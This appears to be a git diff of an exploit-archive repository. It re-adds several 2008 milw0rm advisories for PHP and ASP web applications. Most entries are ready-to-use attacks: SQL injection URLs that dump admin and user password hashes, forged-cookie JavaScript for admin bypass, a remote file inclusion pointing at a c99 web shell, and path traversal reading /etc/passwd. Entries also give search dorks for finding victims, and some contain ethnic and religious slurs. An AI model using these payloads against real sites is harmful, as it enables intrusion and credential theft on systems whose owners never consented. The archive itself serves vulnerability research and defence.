-                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
-
-<<->> InjEctOr5 TeaM   
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-06-26]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script    :  Drinks Website  
+ 
+<<->> Demo site : www.easysitenetwork.com/sites/drinks/
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+  for admin inf0 :: 
+
+   >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+admin_login/*
+
+
+  for members inf0 ::
+
+   >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+users/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x  
+                           
+                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
+
+<<->> InjEctOr5 TeaM   
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5950.txt b/platforms/php/webapps/5950.txt
index d9a9236ae..768454ac4 100755
--- a/platforms/php/webapps/5950.txt
+++ b/platforms/php/webapps/5950.txt
@@ -1,68 +1,68 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script    :  Cheats Website 
- 
-<<->> Demo site : www.easysitenetwork.com/sites/cheats
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-  for admin inf0 :: 
-
-   >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*
-
-
-  for members inf0 ::
-
-   >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker $ anaconda-ksa $ sirus $ crazy-x   
-                          
-                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
-
-<<->> InjEctOr5 TeaM   
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-06-26]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script    :  Cheats Website 
+ 
+<<->> Demo site : www.easysitenetwork.com/sites/cheats
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+  for admin inf0 :: 
+
+   >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*
+
+
+  for members inf0 ::
+
+   >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker $ anaconda-ksa $ sirus $ crazy-x   
+                          
+                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
+
+<<->> InjEctOr5 TeaM   
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5954.txt b/platforms/php/webapps/5954.txt
index 723955154..0deab71d7 100755
--- a/platforms/php/webapps/5954.txt
+++ b/platforms/php/webapps/5954.txt
@@ -1,36 +1,36 @@
-  ####################################################################################################
-  #                                                                                                  #
-  #  ...:::::A+ PHP Scripts - News Management System Insecure Cookie Handling Vulnerability ::::.... #          
-  ###################################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-
---------
-Discoverd By :virangar security team(hadihadi)
-
-special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
-
-& all virangar members & all hackerz
-
-greetz:to my best friend in the world hadi_aryaie2004
-& my lovely friend arash(imm02tal)
--------
-DESCRIPTION:
-
-A+ PHP Scripts - News Management System, suffers from insecure cookie handling, when a admin login is successfull the script creates
-a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
-contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
-logged in as a legit admin.
-
----
-exploit:
-javascript:document.cookie = "mobsuser=1; path=/"; document.cookie = "mobspass=1; path=/";
------
-now you can get admin access and manage the cms ;)
--------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-06-26]
+  ####################################################################################################
+  #                                                                                                  #
+  #  ...:::::A+ PHP Scripts - News Management System Insecure Cookie Handling Vulnerability ::::.... #          
+  ###################################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+
+--------
+Discoverd By :virangar security team(hadihadi)
+
+special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
+
+& all virangar members & all hackerz
+
+greetz:to my best friend in the world hadi_aryaie2004
+& my lovely friend arash(imm02tal)
+-------
+DESCRIPTION:
+
+A+ PHP Scripts - News Management System, suffers from insecure cookie handling, when a admin login is successfull the script creates
+a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
+contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
+logged in as a legit admin.
+
+---
+exploit:
+javascript:document.cookie = "mobsuser=1; path=/"; document.cookie = "mobspass=1; path=/";
+-----
+now you can get admin access and manage the cms ;)
+-------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5955.txt b/platforms/php/webapps/5955.txt
index f4b75e968..e190ad42f 100755
--- a/platforms/php/webapps/5955.txt
+++ b/platforms/php/webapps/5955.txt
@@ -1,44 +1,44 @@
-#####################################################################
-#
-# Orca - Interactive Forum Script Remote File Inclusion Vulnerability
-#
-#####################################################################
-#
-# Discovered by : Ciph3r
-#
-#
-# MAIL : Ciph3r_blackhat@yahoo.com
-#
-#
-# SP tanx4: Iranian hacker & Kurdish security TEAM
-#
-# sp TANX2: milw0rm.com & google.com & sourceforge.net
-# 
-# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624    
-#
-# class : remote
-#
-# risk : high
-#
-# Dork : "Powered by Orca Interactive Forum Script"
-#
-#######################################################################
-#
-# C0de : 
-#
-#               
-#    require_once ($gConf['dir']['layouts'] . 'base/params.php');
-#
-#
-#######################################################################
-
- EXPLOIT :
-
- 
-
- http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php?
-
-
-#######################################################################
-
-# milw0rm.com [2008-06-26]
+#####################################################################
+#
+# Orca - Interactive Forum Script Remote File Inclusion Vulnerability
+#
+#####################################################################
+#
+# Discovered by : Ciph3r
+#
+#
+# MAIL : Ciph3r_blackhat@yahoo.com
+#
+#
+# SP tanx4: Iranian hacker & Kurdish security TEAM
+#
+# sp TANX2: milw0rm.com & google.com & sourceforge.net
+# 
+# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624    
+#
+# class : remote
+#
+# risk : high
+#
+# Dork : "Powered by Orca Interactive Forum Script"
+#
+#######################################################################
+#
+# C0de : 
+#
+#               
+#    require_once ($gConf['dir']['layouts'] . 'base/params.php');
+#
+#
+#######################################################################
+
+ EXPLOIT :
+
+ 
+
+ http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php?
+
+
+#######################################################################
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5956.txt b/platforms/php/webapps/5956.txt
index 7d4aa187d..000595003 100755
--- a/platforms/php/webapps/5956.txt
+++ b/platforms/php/webapps/5956.txt
@@ -1,15 +1,15 @@
-@~~===========================================~~@
-|  Author => StAkeR ~ StAkeR@hotmail.it         |  
-@~~===========================================~~@ 
-+                                               + 
-@~~===========================================~~@
-|  Keller Web Admin <= Local File Inclusion     |
-@~~===========================================~~@
-| Public/index.php?action=../../etc/passwd%00   |                                
-@~~===========================================~~@
-+
-@~~===============================================================~~@
-|  http://mesh.dl.sourceforge.net/sourceforge/kwa/kwa_0_94_pro.zip  |
-@~~===============================================================~~@  
-
-# milw0rm.com [2008-06-26]
+@~~===========================================~~@
+|  Author => StAkeR ~ StAkeR@hotmail.it         |  
+@~~===========================================~~@ 
++                                               + 
+@~~===========================================~~@
+|  Keller Web Admin <= Local File Inclusion     |
+@~~===========================================~~@
+| Public/index.php?action=../../etc/passwd%00   |                                
+@~~===========================================~~@
++
+@~~===============================================================~~@
+|  http://mesh.dl.sourceforge.net/sourceforge/kwa/kwa_0_94_pro.zip  |
+@~~===============================================================~~@  
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5957.txt b/platforms/php/webapps/5957.txt
index e65baa7c2..c32b54360 100755
--- a/platforms/php/webapps/5957.txt
+++ b/platforms/php/webapps/5957.txt
@@ -1,94 +1,94 @@
-===========================================================
-  OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
-===========================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 27 June 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : OTManager CMS
- VERSION     : 24a Completo
- VENDOR      : http://www.otmanager.org/
- DOWNLOAD    : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
-#####################################################
-
----------------------------------------
- Vulnerable File [index.php?conteudo=]
----------------------------------------
-
-@Line
-
-   76:  if($_REQUEST['conteudo']==""){
-   77:  require("Principal.php");
-   78:  }else{
-   79:  if(!file_exists($_REQUEST['conteudo'].".php")){
-   80:  echo '
    404 URL Invalida

    Por Favor, Selecione o Conteudo no Menu ao Lado.
    ';
-   81:  }else{
-   82:       require($_REQUEST['conteudo'].".php");
-   83:       }
-   84:  }
-
-
----------
- Exploit
----------
-
-#####
- LFI
-#####
-
-[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]
-
-   
-    This exploit will open boot.ini in system file:
-
-[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
-
-    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.
-
-#####
- XSS
-#####
-
-[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]
-
-
--------------
- POC Exploit
--------------
-
-#####
- LFI
-#####
-
-[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00
-
-#####
- XSS
-#####
-
-[+] http://192.168.24.25/otmanager/index.php?conteudo=
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-27]
+===========================================================
+  OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
+===========================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 27 June 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : OTManager CMS
+ VERSION     : 24a Completo
+ VENDOR      : http://www.otmanager.org/
+ DOWNLOAD    : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
+#####################################################
+
+---------------------------------------
+ Vulnerable File [index.php?conteudo=]
+---------------------------------------
+
+@Line
+
+   76:  if($_REQUEST['conteudo']==""){
+   77:  require("Principal.php");
+   78:  }else{
+   79:  if(!file_exists($_REQUEST['conteudo'].".php")){
+   80:  echo '
    404 URL Invalida

    Por Favor, Selecione o Conteudo no Menu ao Lado.
    ';
+   81:  }else{
+   82:       require($_REQUEST['conteudo'].".php");
+   83:       }
+   84:  }
+
+
+---------
+ Exploit
+---------
+
+#####
+ LFI
+#####
+
+[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]
+
+   
+    This exploit will open boot.ini in system file:
+
+[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.
+
+#####
+ XSS
+#####
+
+[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]
+
+
+-------------
+ POC Exploit
+-------------
+
+#####
+ LFI
+#####
+
+[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00
+
+#####
+ XSS
+#####
+
+[+] http://192.168.24.25/otmanager/index.php?conteudo=
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-27]
diff --git a/platforms/php/webapps/5958.txt b/platforms/php/webapps/5958.txt
index 134e6fc07..66a968328 100755
--- a/platforms/php/webapps/5958.txt
+++ b/platforms/php/webapps/5958.txt
@@ -1,27 +1,27 @@
-> [+] Script Name     : philboard v 1.14 Multiple Remote Exploits
-
-> |+| Team            : InjEct0r5
-
-> [+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT') ;
-
-> [+] Contact         : blackbeard-sql[A.T]hotmail{.}fr ;
-
-> [+] Dork            : Powered by v1.14 powered by philboard v1.14
-
-> --//-->
-
-> [+] Expl0iT :
-
-> Remote SQL Injection :
-
-> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]
-
-> Blind Way  : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00
-
-> Remote XSS Exploit :
-
-> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]
-
-[XSS] --> 
-
-# milw0rm.com [2008-06-27]
+> [+] Script Name     : philboard v 1.14 Multiple Remote Exploits
+
+> |+| Team            : InjEct0r5
+
+> [+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT') ;
+
+> [+] Contact         : blackbeard-sql[A.T]hotmail{.}fr ;
+
+> [+] Dork            : Powered by v1.14 powered by philboard v1.14
+
+> --//-->
+
+> [+] Expl0iT :
+
+> Remote SQL Injection :
+
+> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]
+
+> Blind Way  : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00
+
+> Remote XSS Exploit :
+
+> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]
+
+[XSS] --> 
+
+# milw0rm.com [2008-06-27]
diff --git a/platforms/php/webapps/5959.txt b/platforms/php/webapps/5959.txt
index 7b918c30d..c165d90e3 100755
--- a/platforms/php/webapps/5959.txt
+++ b/platforms/php/webapps/5959.txt
@@ -1,40 +1,40 @@
-  ###################################################################################
-  #                                                                                 #
-  #      ...:::::OTManager CMS v2.4 Insecure Cookie Handling Vulnerability ::::.... #           
-  ###################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-
---------
-Discoverd By :virangar security team(hadihadi)
-
-special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
-
-& all virangar members & all hackerz
-
-greetz:to my best friend in the world hadi_aryaie2004
-& my lovely friend arash(imm02tal)
--------
-DESCRIPTION:
-OTManager CMS, suffers from insecure cookie handling, when a admin login is successfull the script creates
-a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
-contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
-logged in as a legit admin.
----
-vuln code in /Admin/index.php:
-
-if ($_COOKIE['ADMIN_Hora'] != '' and $_COOKIE['ADMIN_Logado'] == 'SIM' and $_COOKIE['ADMIN_Nome'] != ''){
-header('Location: ADM_Pagina.php'); // redirect to admin area
-
----
-exploit:
-javascript:document.cookie = "ADMIN_Hora=1; path=/"; document.cookie = "ADMIN_Logado=SIM; path=/"; document.cookie = "ADMIN_Nome=1; path=/";
------
-now visit /Admin and  you can get admin access and manage the cms ;)
--------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-06-27]
+  ###################################################################################
+  #                                                                                 #
+  #      ...:::::OTManager CMS v2.4 Insecure Cookie Handling Vulnerability ::::.... #           
+  ###################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+
+--------
+Discoverd By :virangar security team(hadihadi)
+
+special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
+
+& all virangar members & all hackerz
+
+greetz:to my best friend in the world hadi_aryaie2004
+& my lovely friend arash(imm02tal)
+-------
+DESCRIPTION:
+OTManager CMS, suffers from insecure cookie handling, when a admin login is successfull the script creates
+a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
+contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
+logged in as a legit admin.
+---
+vuln code in /Admin/index.php:
+
+if ($_COOKIE['ADMIN_Hora'] != '' and $_COOKIE['ADMIN_Logado'] == 'SIM' and $_COOKIE['ADMIN_Nome'] != ''){
+header('Location: ADM_Pagina.php'); // redirect to admin area
+
+---
+exploit:
+javascript:document.cookie = "ADMIN_Hora=1; path=/"; document.cookie = "ADMIN_Logado=SIM; path=/"; document.cookie = "ADMIN_Nome=1; path=/";
+-----
+now visit /Admin and  you can get admin access and manage the cms ;)
+-------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-06-27]
diff --git a/platforms/php/webapps/5960.txt b/platforms/php/webapps/5960.txt
index 2e64ed89a..773bc9194 100755
--- a/platforms/php/webapps/5960.txt
+++ b/platforms/php/webapps/5960.txt
@@ -1,55 +1,55 @@
-#########################################################################
-#################### Viva IslaM Viva IslaM ##############################
-##
-## Remote SQL Injection Vulnerability
-##
-## SePortal V2.4 ( poll.php poll_id ) ( staticpages.php sp_id )
-##
-#########################################################################
-#########################################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
-##
-## Email  : SQL@Hotmail.it
-##
-## !! SYRIAN HaCkErS  !!
-########################
-########################
-##
-## Script   : SePortal V2.4
-##
-## site     : www.seportal.org
-##
-## Download : http://www.seportal.org/downloads.php?action=showfile&id=1
-##
-########################
-########################
-##
-##     -(:: SQL ::)-
-##
-##    www.site.com/
-##          poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*
-##  
-##
-##  -(:: L!VE DEMO ::)-
-##      
-##       http://demo.seportal.org/poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*
-##       
-##       http://demo.seportal.org/staticpages.php?sp_id=1'    << here maybe most registr ;)
-##
-#######################
-#######################
-
-
-#######################################################################################################
-#######################################################################################################
-
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-06-27]
+#########################################################################
+#################### Viva IslaM Viva IslaM ##############################
+##
+## Remote SQL Injection Vulnerability
+##
+## SePortal V2.4 ( poll.php poll_id ) ( staticpages.php sp_id )
+##
+#########################################################################
+#########################################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
+##
+## Email  : SQL@Hotmail.it
+##
+## !! SYRIAN HaCkErS  !!
+########################
+########################
+##
+## Script   : SePortal V2.4
+##
+## site     : www.seportal.org
+##
+## Download : http://www.seportal.org/downloads.php?action=showfile&id=1
+##
+########################
+########################
+##
+##     -(:: SQL ::)-
+##
+##    www.site.com/
+##          poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*
+##  
+##
+##  -(:: L!VE DEMO ::)-
+##      
+##       http://demo.seportal.org/poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*
+##       
+##       http://demo.seportal.org/staticpages.php?sp_id=1'    << here maybe most registr ;)
+##
+#######################
+#######################
+
+
+#######################################################################################################
+#######################################################################################################
+
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-06-27]
diff --git a/platforms/php/webapps/5961.txt b/platforms/php/webapps/5961.txt
index c434f2535..17d01fb57 100755
--- a/platforms/php/webapps/5961.txt
+++ b/platforms/php/webapps/5961.txt
@@ -1,33 +1,33 @@
-#################################
-Php fusion "classifieds"  SQL-injetion  
-#################################
-
-++++++++++++++++++++++++++++
-Author     :     boom3rang
-contact     :    boomerang [at] knaqu-shqipe [dot] de
-webpage  :  www.khg-crew.ws 
-++++++++++++++++++++++++++++
-
-
-
-----> Remote SQL Injection <------
-
-
-[+] Dork:                     inurl:"classifieds.php?op=detail_adverts"
-
-
-[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]
-
-
-
-exploit:
-www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--
-
-
-
-##########################################
-  greetz to:   All my albanian brothers
-     =United State of Albania = 
-##########################################
-
-# milw0rm.com [2008-06-27]
+#################################
+Php fusion "classifieds"  SQL-injetion  
+#################################
+
+++++++++++++++++++++++++++++
+Author     :     boom3rang
+contact     :    boomerang [at] knaqu-shqipe [dot] de
+webpage  :  www.khg-crew.ws 
+++++++++++++++++++++++++++++
+
+
+
+----> Remote SQL Injection <------
+
+
+[+] Dork:                     inurl:"classifieds.php?op=detail_adverts"
+
+
+[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]
+
+
+
+exploit:
+www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--
+
+
+
+##########################################
+  greetz to:   All my albanian brothers
+     =United State of Albania = 
+##########################################
+
+# milw0rm.com [2008-06-27]
diff --git a/platforms/php/webapps/5963.txt b/platforms/php/webapps/5963.txt
index 1399e884b..0a06b7dda 100755
--- a/platforms/php/webapps/5963.txt
+++ b/platforms/php/webapps/5963.txt
@@ -1,24 +1,24 @@
-/---------------------------------------------------------------\
-\                                				/
-/       Joomla Component jabode Remote SQL injection            \
-\                                				/
-\---------------------------------------------------------------/
-
-
-[*] Author    :  His0k4 [ALGERIAN HaCkEr]
-
-[*] Dork      :  inurl:com_jabode
-
-[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}
-
-[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--
-
-[*] Funny note:  You can change "taurus" to your sign for best results xd...
-
-                
-----------------------------------------------------------------------------
-[*] Greetings :  All friends & muslims HaCkeRs...
-[*] Greetings2:  http://www.dz-secure.com
-                 http://palcastle.org/cc
-
-# milw0rm.com [2008-06-28]
+/---------------------------------------------------------------\
+\                                				/
+/       Joomla Component jabode Remote SQL injection            \
+\                                				/
+\---------------------------------------------------------------/
+
+
+[*] Author    :  His0k4 [ALGERIAN HaCkEr]
+
+[*] Dork      :  inurl:com_jabode
+
+[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}
+
+[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--
+
